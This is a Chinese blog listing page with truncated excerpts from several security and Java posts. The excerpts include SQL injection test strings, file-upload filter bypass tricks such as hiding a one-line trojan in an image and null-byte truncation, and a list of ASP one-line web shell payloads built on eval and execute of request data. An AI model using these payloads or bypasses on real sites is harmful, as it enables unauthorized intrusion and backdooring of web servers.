用户
搜索
分享 SQL注入(一)入门
黄晛 2017-8-1 23:15
一、注入点判断 asp?id=1' asp?id=1 and 1=1 asp?id=1 and 1=2 判断1、注入是否存在 2、判断防火墙或过滤系统 【cookie注入】 进入asp?页面 输入script:alert(document.cookie("id="+escape("1")) 页面正常说明存在注入 页面出错说明 1、web服务器指定从request或POST中提取数据 ...
21 次阅读|0 个评论
分享 上传漏洞
喧嚣如梦 2017-7-28 22:52
MIME类型绕过: 上传木马时,提示格式错误。直接抓包修改Content-Type 为正确的格式尝试绕过 文件扩展名绕过: Php除了可以解析php后缀 还可以解析php2.php3,php4 后缀 文件内容检测绕过: 抓包,在正常图片末尾添加一句话木马 00截断绕过上传 1.php .jpg 空格二进制20改为00 IIS 6.0 目录路径检测解析绕 ...
19 次阅读|0 个评论
分享 waf
喧嚣如梦 2017-7-28 22:52
摘要: 0x01 什么是WAF Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web ... 0x01 什么是WAF Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Appl ...
18 次阅读|0 个评论
分享 shel大全
喧嚣如梦 2017-7-28 22:49
%eval request("c")% %execute request("c")% %execute(request("c"))% %ExecuteGlobal request("sb")% %%Eval(Request(chr(35)))%% %if request ("c")""then session("c")=request("c"):end if:if session("c")"" then execute session("c")% %eval(Reques ...
24 次阅读|0 个评论
分享 c3p0不识别db的username属性
tony2016 2017-7-25 19:02
Invalid property 'username' of bean class : Bean property 'username' is not writable or has an invalid setter method. Does the parameter type of the setter match the return type of the getter? 将dataSource.username=root改为 dataSource.user=root
22 次阅读|0 个评论
分享 浅析Tomcat、JBOSS、WebSphere、WebLogic、Apache
tony2016 2017-7-25 11:20
http://blog.csdn.net/u013573133/article/details/23379565 https://wenku.baidu.com/view/96993875af1ffc4ffe47acba.html
17 次阅读|0 个评论
分享 jackson反序列化详细分析
tony2016 2017-7-20 14:58
http://bobao.360.cn/learning/detail/4122.html
21 次阅读|0 个评论

本页有 3 篇日志因作者的隐私设置或未通过审核而隐藏